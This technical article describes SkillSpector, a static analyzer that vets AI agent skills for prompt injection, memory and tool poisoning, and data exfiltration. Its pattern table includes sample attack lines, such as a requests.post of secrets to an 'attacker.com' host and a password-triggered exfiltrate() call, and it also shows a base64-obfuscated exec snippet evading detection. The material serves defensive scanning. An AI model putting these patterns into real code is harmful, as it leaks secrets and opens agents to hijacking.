NVIDIA released SkillSpector to address a supply chain problem: 26.1% of AI agent skills contain vulnerabilities and 5.2% show likely malicious intent. Agent skills run with implicit trust in platforms like Claude Code, Codex CLI, and Gemini CLI. Before you install a skill that can read your filesystem, call APIs, or modify state, you need to know if it will exfiltrate data, inject prompts, or poison your agent’s memory.
SkillSpector is a static analysis pipeline with 64 vulnerability patterns across 16 categories. It scans Git repos, URLs, zip files, directories, or single files. The architecture uses a two-stage approach: fast static analysis for known patterns, then optional LLM semantic evaluation for ambiguous code.
Two-Stage Analysis Pipeline
The first stage is AST-based static analysis. SkillSpector parses Python code into an abstract syntax tree and matches it against the 64 built-in patterns. Examples of what this catches:
- Prompt injection: User input concatenated into system prompts without sanitization
- Data exfiltration: HTTP requests to unexpected domains, file writes to unusual paths
- Privilege escalation: Subprocess calls with shell=True, eval() on untrusted input
- Tool poisoning: MCP tool definitions that override expected behavior
- Memory poisoning: Direct manipulation of agent state or conversation history
The static pass runs in milliseconds. It produces findings with severity labels (critical, high, medium, low) and a 0-100 risk score.
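To make the AST matching idea concrete, here is a minimal sketch built on Python's standard `ast` module. It is not SkillSpector's actual rule engine: the rule names (`dangerous_call`, `shell_true`), the finding fields, and the `scan_source` helper are assumptions made for illustration, and it covers only two of the patterns mentioned above.

```python
import ast

# Hypothetical rule set: builtins treated as dangerous when called directly.
DANGEROUS_CALLS = {"eval", "exec", "compile"}


def call_name(node: ast.Call) -> str:
    """Return a dotted name for the called object, e.g. 'subprocess.run'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return f"{func.value.id}.{func.attr}"
    return ""


def scan_source(source: str) -> list[dict]:
    """Walk the AST and report calls matching two illustrative patterns."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = call_name(node)
        if name in DANGEROUS_CALLS:
            findings.append({"rule": "dangerous_call", "line": node.lineno, "call": name})
        # Flag subprocess calls that pass the literal keyword shell=True.
        for kw in node.keywords:
            if (
                name.startswith("subprocess.")
                and kw.arg == "shell"
                and isinstance(kw.value, ast.Constant)
                and kw.value.value is True
            ):
                findings.append({"rule": "shell_true", "line": node.lineno, "call": name})
    return findings


# The sample is only parsed, never executed, so undefined names are fine.
SAMPLE = '''import subprocess
subprocess.run(user_cmd, shell=True)
result = eval(user_code)
'''

findings = scan_source(SAMPLE)
for finding in findings:
    print(finding)
```

Because the source is parsed rather than imported or run, a scan like this never executes the skill's code, which is what makes a static pass cheap and safe to run on untrusted input.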
The second stage is optional LLM semantic evaluation. When static analysis flags ambiguous code (for example, a subprocess call that might be safe depending on runtime context), SkillSpector can send the code snippet to an LLM with a prompt asking whether the pattern is exploitable. This adds latency but reduces false positives.
You control the trade-off. Run static-only for CI pipelines where speed matters. Add LLM evaluation for high-stakes installs where you need deeper reasoning.
Vulnerability Categories and Agent-Specific Risks
SkillSpector’s 16 categories map to attack vectors specific to agent ecosystems:
| Category | Attack Vector | Example Pattern |
|---|---|---|
| Prompt injection | User input inserted into system prompt | f"System: {user_input}" without escaping |
| Data exfiltration | Sensitive data sent to external endpoint | requests.post("http://attacker.com", data=secrets) |
| Privilege escalation | Shell command execution with user input | subprocess.run(user_cmd, shell=True) |
| Supply chain | Dependency with known CVE | Package version matches OSV.dev vulnerability |
| Excessive agency | Skill requests more permissions than needed | MCP tool with allow_all_domains=True |
| Output handling | Unescaped output rendered as HTML/JS | return f"<div>{user_data}</div>" |
| System prompt leakage | Skill exposes internal instructions | print(agent.system_prompt) |
| Memory poisoning | Direct writes to conversation state | agent.history.append(fake_message) |
| Tool misuse | Skill calls tools outside declared scope | Filesystem skill making network requests |
| Rogue agent | Skill spawns unauthorized sub-agents | Agent(tools=all_tools, user_input=untrusted) |
| Trigger abuse | Skill activates on unexpected conditions | if "password" in message: exfiltrate() |
| Dangerous code (AST) | Eval, exec, compile on untrusted input | eval(user_code) |
| Taint tracking | Untrusted data flows to sensitive sink | User input reaches os.system() without validation |
| YARA signatures | Binary patterns indicating malware | Obfuscated shellcode in skill package |
| MCP least privilege | Tool grants excessive permissions | Tool allows arbitrary file writes |
| MCP tool poisoning | Tool definition overrides expected behavior | Redefined read_file that also writes |
The MCP categories are specific to the Model Context Protocol, a standard for agent-tool communication. SkillSpector checks whether MCP tool definitions follow least privilege (only request necessary permissions) and whether they override expected tool behavior.
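The two MCP checks can be sketched as a comparison against a baseline. Everything in this example is hypothetical: the `capabilities` field is not part of the MCP tool schema, and the `EXPECTED_CAPABILITIES` baseline and the capability strings are invented for illustration. SkillSpector's real checks may work quite differently.

```python
# Hypothetical baseline: capabilities each well-known tool is expected to need.
EXPECTED_CAPABILITIES = {
    "read_file": {"fs:read"},
    "write_file": {"fs:write"},
}


def check_tool(tool: dict) -> list[str]:
    """Return human-readable findings for one tool definition."""
    findings = []
    name = tool["name"]
    # 'capabilities' is an assumed field used only for this sketch.
    declared = set(tool.get("capabilities", []))

    # Least privilege: wildcard grants are flagged outright.
    wildcards = sorted(c for c in declared if c.endswith("*"))
    if wildcards:
        findings.append(f"{name}: wildcard capability {wildcards}")

    # Tool poisoning: a known tool name redefined with extra capabilities.
    expected = EXPECTED_CAPABILITIES.get(name)
    if expected is not None:
        extra = sorted(declared - expected)
        if extra:
            findings.append(f"{name}: exceeds expected capabilities with {extra}")
    return findings


poisoned = {"name": "read_file", "capabilities": ["fs:read", "fs:write"]}
broad = {"name": "sync_notes", "capabilities": ["net:*"]}

for tool in (poisoned, broad):
    for message in check_tool(tool):
        print(message)
```

The first sample mirrors the "redefined read_file that also writes" row in the table; the second shows an over-broad grant on a tool with no baseline entry.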
SC4 Component and Live CVE Lookups
The SC4 (Supply Chain Security Component) queries OSV.dev for real-time vulnerability data. When SkillSpector finds a dependency (parsed from requirements.txt, pyproject.toml, or package.json), SC4 sends the package name and version to OSV.dev’s API.
If OSV.dev returns a matching vulnerability, SkillSpector includes it in the report with severity, description, and remediation link. If the API is unreachable, SC4 falls back to an offline vulnerability database bundled with the tool, so scans still complete in air-gapped environments or when OSV.dev is down.
The offline fallback is a JSON file updated weekly via CI. It contains high-severity CVEs for common agent dependencies (requests, aiohttp, langchain, openai SDK). The trade-off: offline mode misses vulnerabilities disclosed since the last weekly update, as well as anything outside its high-severity subset, but guarantees scans complete.
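The live-lookup-with-fallback behavior might look roughly like the sketch below. The request shape follows OSV.dev's public `POST /v1/query` endpoint; the `lookup` and `query_osv` helpers, the `OFFLINE_DB` structure, and the five-second timeout are assumptions for illustration, not SC4's actual code.

```python
import json
import urllib.request

OSV_QUERY_URL = "https://api.osv.dev/v1/query"

# Hypothetical stand-in for the bundled offline database.
OFFLINE_DB = {
    ("PyPI", "requests", "2.25.0"): ["CVE-2023-32681"],
}


def query_osv(name: str, version: str, ecosystem: str) -> list[str]:
    """Ask OSV.dev which vulnerability IDs affect one package version."""
    payload = json.dumps(
        {"version": version, "package": {"name": name, "ecosystem": ecosystem}}
    ).encode("utf-8")
    request = urllib.request.Request(
        OSV_QUERY_URL, data=payload, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(request, timeout=5) as response:
        body = json.load(response)
    # OSV omits the 'vulns' key when nothing matches.
    return [vuln["id"] for vuln in body.get("vulns", [])]


def lookup(name, version, ecosystem="PyPI", fetch=query_osv, offline_db=OFFLINE_DB):
    """Return (source, ids); fall back to offline data if the live query fails."""
    try:
        return "osv.dev", fetch(name, version, ecosystem)
    except (OSError, ValueError):
        # URLError and timeouts are OSError subclasses; ValueError covers bad JSON.
        return "offline", offline_db.get((ecosystem, name, version), [])


def simulated_outage(name, version, ecosystem):
    """Stand-in fetcher that behaves like an unreachable API."""
    raise OSError("network unreachable")


print(lookup("requests", "2.25.0", fetch=simulated_outage))
```

Passing the fetcher as a parameter keeps the fallback path testable without network access. Returning the data source alongside the IDs lets a report state whether its results came from the live API or from the possibly stale offline file.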
Output Formats and Integration Points
SkillSpector outputs four formats:
- Terminal: Human-readable summary with color-coded severity
- JSON: Machine-readable for CI pipelines
- Markdown: For GitHub PR comments or documentation
- SARIF: Static Analysis Results Interchange Format for GitHub Code Scanning, GitLab SAST, and other security dashboards
The SARIF output is the integration point for existing security workflows. You can pipe SkillSpector results into the same dashboards that track Snyk, Semgrep, or CodeQL findings.
Example JSON output structure:
{
  "risk_score": 78,
  "severity": "high",
  "findings": [
    {
      "category": "prompt_injection",
      "severity": "critical",
      "file": "skill.py",
      "line": 42,
      "code": "prompt = f\"System: {user_input}\"",
      "description": "User input concatenated into system prompt without sanitization",
      "remediation": "Use parameterized prompts or escape user input"
    }
  ],
  "dependencies": [
    {
      "name": "requests",
      "version": "2.25.0",
      "vulnerabilities": [
        {
          "id": "CVE-2023-32681",
          "severity": "medium",
          "description": "Proxy-Authorization header leak",
          "url": "https://osv.dev/CVE-2023-32681"
        }
      ]
    }
  ]
}
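For readers unfamiliar with SARIF, the sketch below shows how findings in the JSON shape above could map onto a minimal SARIF 2.1.0 log. The severity-to-level mapping and the `to_sarif` helper are assumptions; SkillSpector's own SARIF writer may emit more fields (rule metadata, fingerprints) than this.

```python
import json

# Assumed mapping from the report's severity labels to SARIF result levels.
SARIF_LEVELS = {"critical": "error", "high": "error", "medium": "warning", "low": "note"}


def to_sarif(report: dict, tool_name: str = "SkillSpector") -> dict:
    """Convert the 'findings' list of a report into a minimal SARIF log."""
    results = []
    for finding in report.get("findings", []):
        results.append({
            "ruleId": finding["category"],
            "level": SARIF_LEVELS.get(finding["severity"], "warning"),
            "message": {"text": finding["description"]},
            "locations": [{
                "physicalLocation": {
                    "artifactLocation": {"uri": finding["file"]},
                    "region": {"startLine": finding["line"]},
                }
            }],
        })
    return {
        "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
        "version": "2.1.0",
        "runs": [{"tool": {"driver": {"name": tool_name}}, "results": results}],
    }


# Trimmed copy of the example report above.
report = {
    "risk_score": 78,
    "findings": [{
        "category": "prompt_injection",
        "severity": "critical",
        "file": "skill.py",
        "line": 42,
        "description": "User input concatenated into system prompt without sanitization",
    }],
}

sarif = to_sarif(report)
print(json.dumps(sarif, indent=2))
```

SARIF only defines the levels `error`, `warning`, `note`, and `none`, so a four-step severity scale has to collapse somewhere; here critical and high both become `error`.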
Architecture and Extension Points
SkillSpector is built as a plugin pipeline. Each vulnerability category is a separate analyzer module. The core scanner orchestrates:
- Input normalization: Clone Git repo, extract zip, or read local files
- File discovery: Find Python files, SKILL.md manifests, dependency files
- Static analysis: Run all analyzer modules in parallel
- Dependency scanning: Query SC4 for CVE data
- LLM evaluation (optional): Send flagged snippets to LLM for semantic check
- Report generation: Aggregate findings, calculate risk score, format output
To add a new vulnerability pattern, you implement an analyzer class with a scan() method that returns a list of findings. The scanner automatically includes it in the pipeline.
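A plugin pipeline of this kind can be sketched as follows. The base class, the `ANALYZERS` registry, the `scan(path, source)` signature, and the `hardcoded_secret` example category are all hypothetical; the source only states that an analyzer exposes a `scan()` method returning a list of findings and that analyzers run in parallel.

```python
from concurrent.futures import ThreadPoolExecutor

ANALYZERS = []  # hypothetical registry, filled as subclasses are defined


class Analyzer:
    """Base class; subclasses register themselves automatically."""

    category = "unnamed"

    def __init_subclass__(cls, **kwargs):
        super().__init_subclass__(**kwargs)
        ANALYZERS.append(cls)

    def scan(self, path: str, source: str) -> list[dict]:
        raise NotImplementedError


class HardcodedSecretAnalyzer(Analyzer):
    """Illustrative analyzer: flags lines that assign a quoted API key."""

    category = "hardcoded_secret"

    def scan(self, path, source):
        findings = []
        for number, line in enumerate(source.splitlines(), start=1):
            if "API_KEY =" in line and '"' in line:
                findings.append({"category": self.category, "file": path, "line": number})
        return findings


def run_all(path: str, source: str) -> list[dict]:
    """Run every registered analyzer in parallel and merge the findings."""
    with ThreadPoolExecutor() as pool:
        batches = pool.map(lambda cls: cls().scan(path, source), ANALYZERS)
        return [finding for batch in batches for finding in batch]


print(run_all("skill.py", 'x = 1\nAPI_KEY = "abc"\n'))
```

Registering through `__init_subclass__` is one way to get the "automatically included" behavior: defining the subclass is enough, with no separate registration call to forget.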
The LLM evaluation stage uses a prompt template that describes the vulnerability category and asks whether the code is exploitable. You can swap the LLM provider (OpenAI, Anthropic, local Ollama) via environment variables.
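As a rough illustration of the prompt template and provider switch, consider the sketch below. The template wording, the `SKILL_SCAN_LLM_PROVIDER` variable name, and the default provider are invented for this example; check SkillSpector's documentation for the real environment variables.

```python
import os
from string import Template

# Hypothetical template; the real prompt wording is not given in this article.
PROMPT = Template(
    "You are reviewing an AI agent skill for the vulnerability category "
    "'$category'.\n"
    "Code snippet:\n$snippet\n"
    "Is this pattern exploitable? Answer EXPLOITABLE or BENIGN, then explain."
)

SUPPORTED_PROVIDERS = {"openai", "anthropic", "ollama"}


def build_prompt(category: str, snippet: str) -> str:
    """Fill the template for one flagged snippet."""
    return PROMPT.substitute(category=category, snippet=snippet)


def select_provider(env=None) -> str:
    """Read the provider name from the environment (variable name is assumed)."""
    env = os.environ if env is None else env
    provider = env.get("SKILL_SCAN_LLM_PROVIDER", "openai").lower()
    if provider not in SUPPORTED_PROVIDERS:
        raise ValueError(f"unsupported provider: {provider}")
    return provider


prompt = build_prompt("privilege_escalation", "subprocess.run(cmd, shell=True)")
print(select_provider({"SKILL_SCAN_LLM_PROVIDER": "ollama"}))
print(prompt)
```

Asking for a fixed verdict token before the explanation makes the response easier to parse, though it does not remove the run-to-run variation inherent in LLM output.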
Failure Modes and Limitations
SkillSpector has clear boundaries:
- No runtime analysis: It cannot detect vulnerabilities that only appear at runtime (for example, a skill that behaves differently based on environment variables)
- AST-only for Python: JavaScript, TypeScript, and other languages get basic pattern matching but no deep AST analysis
- LLM evaluation is non-deterministic: The same code snippet may get different verdicts across runs
- Obfuscation defeats static analysis: Base64-encoded payloads or dynamically constructed code paths parse cleanly but do not match AST patterns, so they can slip through
- False positives on safe patterns: A subprocess call with hardcoded arguments may trigger a finding even though it is not exploitable
The tool is designed for pre-installation vetting, not continuous monitoring. Once a skill is installed, SkillSpector cannot detect if it phones home or modifies behavior based on external signals.
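The obfuscation and false-positive limits listed above are easy to reproduce with a deliberately naive check. The function below is a toy written for this illustration, not one of SkillSpector's analyzers.

```python
import ast


def finds_eval_or_exec(source: str) -> bool:
    """Naive check: is there a direct call to the name `eval` or `exec`?"""
    return any(
        isinstance(node, ast.Call)
        and isinstance(node.func, ast.Name)
        and node.func.id in {"eval", "exec"}
        for node in ast.walk(ast.parse(source))
    )


# Direct call on untrusted input: matches the pattern.
DIRECT = "exec(payload)"

# Same effect at runtime, but the call target is assembled from an encoded
# string ("ZXhlYw==" is base64 for "exec"), so no matching name appears.
OBFUSCATED = '''import base64, builtins
run = getattr(builtins, base64.b64decode("ZXhlYw==").decode())
run(payload)
'''

# Hardcoded constant argument: flagged even though nothing untrusted flows in.
HARDCODED = 'exec("x = 1")'

print(finds_eval_or_exec(DIRECT))      # True
print(finds_eval_or_exec(OBFUSCATED))  # False (missed)
print(finds_eval_or_exec(HARDCODED))   # True (false positive)
```

The samples are only parsed, never executed. The missed case is why sandboxing and runtime monitoring still matter after a clean scan, and the flagged constant is the kind of ambiguity the optional LLM stage is meant to resolve.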
Technical Verdict
Use SkillSpector when:
- You are vetting third-party agent skills before installation
- You need a fast, automated check in CI pipelines
- You want SARIF output for existing security dashboards
- You are building an agent marketplace and need supply chain hygiene
Avoid or supplement when:
- You need runtime monitoring of installed skills
- The skill uses heavy obfuscation or dynamic code generation
- You require formal verification or proof of safety
- The skill is written in a language other than Python (limited support)
SkillSpector is a static filter, not a guarantee. It catches known bad patterns and common mistakes. Pair it with sandboxing (containers, VMs, capability-based security) and runtime monitoring (syscall tracing, network egress rules) for defense in depth.